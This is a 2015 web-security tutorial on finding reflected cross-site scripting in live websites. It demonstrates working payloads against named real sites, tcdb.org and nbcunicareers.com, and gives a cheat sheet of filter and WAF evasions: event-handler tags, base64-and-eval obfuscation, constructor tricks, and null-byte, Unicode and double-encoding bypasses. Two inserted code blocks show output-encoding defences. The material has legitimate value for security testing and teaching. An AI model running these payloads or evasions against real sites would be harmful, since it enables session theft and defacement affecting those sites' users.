Finding XSS in Real World




Finding XSS in Real World by Alexander Korznikov nopernik@gmail.com 1 April 2015

Hi there, in this tutorial I will try to explain how to find XSS in the real world, using some interesting techniques. All of you know that XSS is based on some kind of code injection. It may be <script> tag injection, or just an -alert()-; I will explain that later. What do you need to find an XSS? Simply a browser. But if you want to find it much faster, you may use this software:

1. Firefox Browser
2. FireBug add-on
3. HackBar add-on
4. Google

I wanted to learn some advanced XSS techniques, and found a pretty cool way: http://xssposed.org. There are tons of verified XSSs published by lots of security researchers, affecting VIP sites as well. A VIP website on xssposed.org is one with Google PR > 6 or Alexa rank < 50000. So I wrote a script that grabbed all xssposed.org XSS URLs, and started to filter out the uninteresting fields. There were about 7500 URLs. You can download the list from here: https://ghostbin.com/paste/n6vk7/raw and filter out all you don't need.

1. Real XSS (HTML Injection) Demo

I will take real examples of XSSs from xssposed.org that were not patched for a very, very long time. Our first target will be www.tcdb.org, XSS report dated 14/06/2008. Since that date, the same XSS was reported 3 more times.

Take a look at the search field. Let's enter some RANDOMSTRING inside an <xxx> tag. The purpose of this test is to validate whether there is any sanitization of user input:

    <xxx>randomstring<xxx>

As output, we see our RANDOMSTRING without the <xxx> tags.

Let's take a look at the source (CTRL+U in Firefox and Chrome). As you can see, there is no filtering, and our <xxx> tag is passed to the browser as HTML. The purple color means that <xxx> was interpreted as a tag. Finally, we enter:

    <script>alert(document.domain)</script>

One thing you should notice: there are no GET parameters in the URL. In this example POST was used. Open the HackBar add-on in Firefox, and after you get to the search results, press Load URL and tick the checkbox Enable Post data. Some server-side scripts handle GET and POST requests the same way. Let's check it:

    http://www.tcdb.org/search/index.php?query=%3cscript%3ealert%28document.domain%29%3c%2fscript%3e
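The <xxx> probe above only tells you something when you compare the raw reflection with what a correctly encoded reflection looks like. The following is an added example and not code from the tutorial or from the site it tests; renderNaive, renderEncoded and probeReflectedAsMarkup are assumed names modelling the vulnerable and the hardened page.

```javascript
// Added example, not code from the original tutorial. It models the tutorial's
// <xxx>randomstring<xxx> probe: the probe tells you something only when you
// compare the raw reflection with what a correctly encoded reflection looks
// like. renderNaive, renderEncoded and probeReflectedAsMarkup are assumed names.

// Encodes the five characters that matter in an HTML text or attribute context.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The vulnerable pattern seen on the tutorial's first target: the search query
// is written back into the page verbatim.
function renderNaive(query) {
  return "<p>Search results for: " + query + "</p>";
}

// Hardened version of the same page: the query is encoded for the HTML
// context first, so <xxx> (or <script>) is displayed as text, not parsed.
function renderEncoded(query) {
  return "<p>Search results for: " + escapeHtml(query) + "</p>";
}

// True when the probe tag survives in the response as real markup, i.e. the
// application did not encode user input for the HTML context (what the
// tutorial checks by hand with CTRL+U and the purple tag colouring).
function probeReflectedAsMarkup(responseHtml, probeTag = "xxx") {
  return new RegExp("<" + probeTag + "(\\s[^>]*)?>", "i").test(responseHtml);
}

const PROBE = "<xxx>randomstring<xxx>"; // constructed: same probe as in the tutorial

console.log(probeReflectedAsMarkup(renderNaive(PROBE)));   // true: no output encoding
console.log(probeReflectedAsMarkup(renderEncoded(PROBE))); // false: shown as literal text
```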

2. WAF Filter Evasions

What if the <script> tag is filtered out? Some WAF evasion cheat-sheets claim that we can still use the <script> tag, but I've never seen this in the real world, so I don't even try it. Some variations:

    <img src=x onerror=alert()>
    <img/src=x onerror="alert()">
    <svg onload=alert()>
    <svg/onload="alert()">
    <marquee onstart=alert()>
    <div style="width:1000px;height:1000px" onmouseover=alert()>asdfa</div>
    <a onmouseover=alert()>some random text

What if alert() is filtered?

    confirm()
    prompt()
    window['alert']('xss')
    window['ale'+'rt']('xss')
    eval(window.atob('YWxlcnQoJ3hzcycp'))  // decode the base64 string && execute it
    eval(window['atob']('YWxlcnQoJ3hzcycp'))
    window['e'+'v'+'a'+'l'](window['atob']('YWxlcnQoJ3hzcycp'))

Awesome evasion technique:

    []["filter"]["constructor"]( CODE )()

eval('alert()') is equal to:

    []["filter"]["constructor"]( window['atob']('YWxlcnQoJ3hzcycp') )()  // equals eval()

And more evasion:

    []["fil"+"ter"]["constr"+"uctor"]( window['atob']('YWxlcnQoJ3hzcycp') )()
    document.body += atob('PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+')  // decoded base64 == <script>alert()</script>

Some reference on []() functions:

    false     => ![]
    true      => !![]
    undefined => [][[]]
    NaN       => +[![]]
    0         => +[]
    1         => +!+[]
    2         => !+[]+!+[]
    10        => [+!+[]]+[+[]]
    Array     => []
    Number    => +[]
    String    => []+[]
    Boolean   => ![]
    Function  => []["filter"]
    eval      => []["filter"]["constructor"]( CODE )()
    window    => []["filter"]["constructor"]("return this")()

Some security researchers go deeper and develop tools like:

    http://www.jsfuck.com/
    http://patriciopalladino.com/files/hieroglyphy/

These convert your JavaScript CODE into only the []()!+ characters, for example:

    [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])

Thanks to Patricio Palladino and Martin Kleppe. You already understand string manipulation like 'ale'+'rt', so I will not explain it again :)

What if the () characters are filtered?

    onerror=alert; throw 'xss'

document.body += string will append your string to the end of the <body> tag:

    document.body += '<script>alert\x28\x29</script>'  // in HEX: \x28 == ( and \x29 == )

Or you can encode the whole string <script>alert()</script> in HEX:

    document.body += '\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'

Or just use your XSS as an open redirect:

    document.location = 'http://google.com'  // open redirect

Again, document.location == document['locati'+'on']. Keep that in mind.

As an additional reference, I recommend reading this book: http://dl.packetstormsecurity.net/papers/bypass/waf_bypassing_by_rafaybaloch.pdf

Simple HTML injections are easy to sanitize. Filter out tags and the = character, and finding an XSS becomes a painful job. For example, Microsoft .NET 4 marks as a Dangerous Request every request containing the character < followed by almost any ASCII character. I've not found a way to evade it. So <s or <m or </ will be marked as dangerous. The only way to bypass it is to use onmouseover=alert() > in case = is not filtered out. ModSecurity doesn't know about confirm(). Some others don't handle Unicode encoding and/or double URL encoding. If you can't use the onload keyword, try:

    onl%00oad    // null byte
    onl%u006fad  // Unicode
    onl%256fad   // double URL encoding

Or if the = character is filtered or marked as dangerous, try onload%u003d (the Unicode representation of the = character).

Fine. This is over. Next, I will show you a real example of inline JavaScript injection.

3. Inline JavaScript Injection

The interesting thing is that this type of injection can be found on popular websites. Even if tags and the equals character are sanitized, XSS is possible. If the website's logic (no matter whether it is server-side or client-side) reflects the user's input in the web page's JavaScript, we can utilize it for nasty purposes :)

Simple example. We have the URL:

    http://www.example.com/?id=1&style=blue

1. Parameter id is handled by server-side logic, which checks that it is an INTEGER.
2. Parameter style is handled by client-side JavaScript and reflected in this context:

    var site.style = 'blue'

If we pass the string blue' (with a single quote) to the style parameter, the context becomes:

    var site.style = 'blue''

This throws a JavaScript exception: SyntaxError: unterminated string literal. Model: 'string'trash'string', so 'blue'' leaves an unclosed string.

In the case of a double quote, the query blue" gives: SyntaxError: unterminated string literal.

If the id parameter is handled client-side and reflected in this context:

    var site.id = 1

the injected payload id=1 trash will look like:

    var site.id = 1 trash

which also throws a SyntaxError exception. If our payload is style=blue\ :

    var site.style = 'blue\'

Again a SyntaxError exception, because JavaScript interprets \' as an escaped quote.

So we can develop a non-invasive XSS locator:

    '">trash\

(single quote / double quote / space / greater sign / string / backslash)

Some examples of what this locator will break (in case of no filtration). HTML code break (in the screenshot, RED = rendered as tags, BLUE = thrown out onto the screen):

    <a href="http://example.com/?id=1&style='">trash\" style="blablabla">

JavaScript SyntaxErrors (RED = syntax errors):

    var a = 'blue'">trash\'
    a=unescape('blue'">trash\')
    var a = "blue'">trash\"
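To show what the locator does to the inline-JavaScript context above, and what the fix looks like, here is an added example (not code from the tutorial or from any site it discusses). It rebuilds the var site.style = 'blue' context by string concatenation, compiles the result the way a browser would, and contrasts it with a version that serialises the value with JSON.stringify; the function names and the '-a()-' probe from the later demo are assumed for illustration.

```javascript
// Added example, not code from the original tutorial. It reproduces the
// inline-JavaScript context from the text ("var site.style = 'blue'") to show
// why the '">trash\ locator breaks it, and how serialising the value with
// JSON.stringify keeps the generated script well-formed. Function names and
// the sample contexts are assumed for illustration.

// Vulnerable pattern: the query parameter is concatenated into a JS string
// literal exactly as the tutorial describes.
function buildInlineScriptNaive(style) {
  return "var site = {}; site.style = '" + style + "'; return site.style;";
}

// Hardened pattern: JSON.stringify emits a valid JS string literal with quotes
// and backslashes escaped; "</" and the U+2028/U+2029 line terminators are
// escaped as well so the literal can never close the <script> element or
// break the line it sits on.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, "<\\/")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function buildInlineScriptSafe(style) {
  return "var site = {}; site.style = " + jsStringLiteral(style) + "; return site.style;";
}

// Parses and runs the generated script the way the browser would.
// Returns { ok: true, value } when the script runs cleanly, otherwise
// { ok: false, error } with the exception name: SyntaxError means the injected
// text broke the literal, ReferenceError means an injected call was reached.
function tryCompile(source) {
  try {
    return { ok: true, value: new Function(source)() };
  } catch (e) {
    return { ok: false, error: e.name };
  }
}

// The tutorial's non-invasive locator and the '-a()-' probe from its demo.
const LOCATOR = "'\">trash\\";
const PROBE = "'-a()-'";

console.log(tryCompile(buildInlineScriptNaive("blue")));    // { ok: true, value: 'blue' }
console.log(tryCompile(buildInlineScriptNaive(LOCATOR)));   // { ok: false, error: 'SyntaxError' }
console.log(tryCompile(buildInlineScriptNaive(PROBE)));     // { ok: false, error: 'ReferenceError' }
console.log(tryCompile(buildInlineScriptSafe(LOCATOR)));    // { ok: true, value: "'\">trash\\" }
console.log(tryCompile(buildInlineScriptSafe(PROBE)));      // { ok: true, value: "'-a()-'" }
```

The ReferenceError in the third line is the signal the tutorial's demo reads from the '-a()-' probe: the injected call was reached, so the string literal has been closed by the input.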

Sometimes the website logic escapes ' or " characters, so try adding backslashes to our locator:

    \'\">trash\

As a result you may see:

    var a = 'blue\\'\\">trash\'

A \ in the input becomes \\ in the output, so our backslash is escaped and the quotation mark is rendered. One more thing to remember: we can perform all mathematical operations on all objects in JavaScript. For example: 'ale'+'rt', or a-b, or a*b. Google for more info :)

Examples of nasty JavaScript injections with various payloads:

    var a = 'blue'
    var a = 'blue'-alert('xss')-''           // alert() will be executed
    var b = ['red','blue',alert('xss'),'']
    var c = func('blue'+alert(/xss/))//')    // after // the rest of the line is commented out

Inline JavaScript Real Demo

Our second target will be www.nbcunicareers.com, XSS report date: 28/06/2014. To make our life easier we will need the FireBug and HackBar Firefox add-ons. Entering our XSS locator ('">trash\) into the website's Find Jobs input field:

Got us to this URL:

    http://www.nbcunicareers.com/search-results?search_type=criteria&country=6&state=all&city=all&keywords='">trash\

and as a response we get: as you can see in FireBug's output, an exception is thrown: SyntaxError: missing } after property list. By clicking on the green URL right after the SyntaxError, we get the generated JavaScript source code. As you can notice, on lines 570 and 577 the code is broken. After the server-side logic, our XSS locator looks like:

    '&quot;&gt;trash\

So the " and > characters are converted to the HTML entities &quot; and &gt; respectively.

But the single quote is not converted, and that alone broke the JavaScript code. Let's test for the other useful characters, ( and ), and enter this payload:

    '-a()-'

Looks pretty good: the characters aren't converted and are passed into the generated JavaScript. How does JavaScript understand this payload? The ' closes the string, and - subtracts the result of the a() function. So our final payload should look like:

    '-alert('XSS')-'

and should not break the execution of the generated JavaScript. pwned again :)

Ask & comment at www.korznikov.com

That's all folks!